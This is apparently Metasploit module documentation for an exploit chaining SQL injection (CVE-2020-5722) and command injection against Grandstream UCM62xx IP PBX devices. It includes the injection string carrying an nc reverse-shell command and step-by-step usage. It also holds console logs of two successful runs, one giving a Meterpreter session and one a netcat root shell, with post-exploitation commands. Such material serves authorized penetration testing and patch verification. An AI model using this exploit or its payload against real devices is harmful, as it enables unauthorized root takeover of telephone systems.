## Vulnerable Application

### Description

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
a command injection vulnerability (technically, no assigned CVE but was inadvertently
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
series of devices. The vulnerabilities allow an unauthenticated remote attacker to
execute commands as `root`.

Exploitation happens in two stages:

1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user provided username is passed to a Python script
   via the shell. Like so:

```
  /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
    password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
```

This module affect UCM62xx versions before firmware version 1.0.19.20.

### Installation

The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
However, if you have a device, affected firmware can be downloaded here:

* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip

## Verification Steps

* Acquire an affected device and configure it with the affected firmware
* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
* Do: `set RHOST <ip>`
* Do: `check`
* Verify the remote target is flagged as vulnerable
* Do: `set LHOST <ip>`
* Do: `set LPORT <port>`
* Do: `exploit`
* You should get a Meterpreter session.

## Targets

### 0

This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.

### 1

This target obtains a meterpreter session using `wget`.

## Options

### TARGETURI

Specifies base URI. The default value is `/`.

## Scenarios

### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get Meterpreter session.

```
msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
[*] Using configured payload linux/armle/meterpreter/reverse_tcp
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set RHOST 10.0.0.9
RHOST => 10.0.0.9
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > check

[*] Requesting version information from /cgi
[*] The reported version is: 1.0.18.13
[*] 10.0.0.9:8089 - The target appears to be vulnerable. This determination is based on the version string.
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run

[*] Started reverse TCP handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Requesting version information from /cgi
[*] The reported version is: 1.0.18.13
[+] The target appears to be vulnerable. This determination is based on the version string.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/unV0mXd6RPWD
[*] Local IP: http://10.0.0.3:8080/unV0mXd6RPWD
[*] Client 10.0.0.9 (Wget/1.10.1) requested /unV0mXd6RPWD
[*] Sending payload to 10.0.0.9 (Wget/1.10.1)
[*] Sending stage (903400 bytes) to 10.0.0.9
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.9:51031 ) at 2022-01-15 12:12:28 -0800
[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > shell
Process 4990 created.
Channel 1 created.
whoami
root
uname -a
Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
cat /proc/cpuinfo
Processor	: ARMv7 Processor rev 10 (v7l)
processor	: 0
BogoMIPS	: 1988.29

processor	: 1
BogoMIPS	: 1987.37

Features	: swp half thumb fastmult vfp edsp neon vfpv3
CPU implementer	: 0x41
CPU architecture: 7
CPU variant	: 0x2
CPU part	: 0xc09
CPU revision	: 10

Hardware	: Freescale i.MX 6Quad/DualLite/Solo based Board
Revision	: 63015
Serial		: 1126b9d4eacb275c
```

### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.

```
msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
[*] Using configured payload linux/armle/meterpreter/reverse_tcp
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set target 0
target => 0
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set RHOST 10.0.0.9
RHOST => 10.0.0.9
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run

[*] Started reverse TCP handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Requesting version information from /cgi
[*] The reported version is: 1.0.18.13
[+] The target appears to be vulnerable. This determination is based on the version string.
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[+] Exploit successfully executed.
[*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.9:51251 ) at 2022-01-15 12:19:18 -0800

whoami
root
uname -a
Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
ps faux
PID   USER     TIME   COMMAND
    1 root       0:00 /sbin/init
    2 root       0:00 [kthreadd]
    3 root       0:05 [ksoftirqd/0]
    5 root       0:00 [kworker/u:0]
    6 root       0:00 [migration/0]
    7 root       0:00 [khelper]
    8 root       0:00 [kworker/u:1]
  156 root       0:00 [sync_supers]
  158 root       0:00 [bdi-default]
  160 root       0:00 [kblockd]
  186 root       0:00 [imx6q-ecspi.0]
  188 root       0:00 [imx6q-ecspi.2]
  197 root       0:00 [khubd]
  293 root       0:00 [rpciod]
  301 root       0:00 [usb_wakeup thre]
  304 root       0:00 [usb_wakeup thre]
  315 root       0:00 [kswapd0]
  316 root       0:00 [ksmd]
  317 root       0:00 [fsnotify_mark]
  318 root       0:00 [nfsiod]
  323 root       0:00 [crypto]
  438 root       0:00 [kworker/0:3]
  440 root       0:01 [mmcqd/0]
  441 root       0:00 [mmcqd/0boot0]
  442 root       0:00 [mmcqd/0boot1]
  564 root       0:00 udevd --daemon
 1477 root       0:00 [kworker/1:2]
 3677 root       0:00 [kworker/0:1]
 3716 root       0:00 [kworker/1:0]
 5347 root       0:00 [kworker/0:0]
 5507 root       0:00 [migration/1]
 5544 root       0:02 [ksoftirqd/1]
 5959 root       0:00 /bin/sh
 6008 root       0:00 [kworker/1:1]
 6028 root       0:00 dbus-daemon --session --print-address --fork
 6035 root       0:21 /usr/bin/gs_gui
 6060 root       0:00 /usr/sbin/crond -c /etc/crontabs
 6067 root       0:00 [jbd2/mmcblk0p14]
 6068 root       0:00 [ext4-dio-unwrit]
 6071 root       0:00 [jbd2/mmcblk0p15]
 6072 root       0:00 [ext4-dio-unwrit]
 6294 root       0:01 lowmem_killer
 6297 root       0:00 /usr/bin/pvalue_validation_server /tmp/.pvalue_validation /etc/pvalues.xml
 6298 root       0:00 msg_server
 6319 root       0:00 /sbin/dropbear -jk -p 22
 6363 root       0:00 ifplugd -I -q -d 3 -i eth1
 6460 root       0:00 syslogd -O /log/syslog -T /var/log/syslog.tmp -i 60 -s 1900 -b 24 -l 8
 6462 root       0:00 klogd
 6468 root       0:00 [flush-179:0]
 6661 root       0:00 sleep 60
 6774 root       0:00 {safe_postfix.sh} /bin/sh /cfg/var/lib/asterisk/scripts/safe_postfix.sh
 6783 root       0:03 python /cfg/var/lib/asterisk/scripts/mail_log_monitor.py
 6828 root       0:00 sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
 6843 root       0:00 /bin/sh
 6947 root       0:00 sleep 2
 6948 root       0:00 ps faux
 7253 root       0:00 udhcpc -m -b -i eth1 -V UCM -O vendor -O vivs -O timezone -O ntpsrv -p /var/run/udhcpc.pid.eth1
 7439 root       0:00 /usr/libexec/postfix/master -w
 7441 postfix    0:00 qmgr -l -t unix -u
 7929 root       0:00 [el_handler]
 7963 root       0:00 [TAPIevents]
 8046 root       0:00 [tSVIP0_Rcv]
 8047 root       0:00 [tSVIP0_Ack]
 8052 root       0:00 [tSVIP0_Hnd]
 8156 root       0:00 udevd --daemon
 8170 root       0:00 udevd --daemon
 8278 postfix    0:00 pickup -l -t unix -u
 8435 root      11:17 [fxo.checkhookd]
 8546 root       7:04 [fxs.checkhookd]
 8583 root       0:00 {safe_asterisk} /bin/sh /app/asterisk/sbin/safe_asterisk
 8648 root       0:00 /app/asterisk/libexec/slapd
 8663 root       3:44 /app/asterisk/sbin/asterisk -f -vvvg -c
 8744 root       0:00 /app/asterisk/sbin/dhcpd -cf /app/asterisk/etc/dhcpd.conf -lf /app/asterisk/etc/dhcp/dhcpd.lease -pf /tmp/dhcpd.pid eth0
 8909 root       0:03 /app/asterisk/bin/cgi
 8947 root       0:05 /app/asterisk/sbin/zero_config
 8954 root       0:00 {safe_ucm_warnin} /bin/sh /app/asterisk/bin/safe_ucm_warning
 8960 root       0:07 /app/asterisk/bin/ucm_warning
 8965 root       0:09 python /app/asterisk/bin/service_check.py
 8966 root       0:05 python /app/asterisk/bin/cgi_service_check.py
 8967 root       0:12 python /app/asterisk/bin/mcm_service_check.py
 8968 root       0:12 python /app/asterisk/bin/avs_service_check.py
 9122 root       0:00 python /app/asterisk/bin/portmap.py
 9174 root       0:13 {safe_mid.sh} /bin/sh /cfg/var/lib/asterisk/scripts/safe_mid.sh
 9175 root       0:11 python /app/asterisk/var/lib/asterisk/scripts/core_manager.py
 9189 root       0:35 /app/asterisk/bin/pbxmid
12699 root       0:45 /app/asterisk/sbin/lighttpd -f /app/asterisk/etc/lighttpd/lighttpd.conf
```
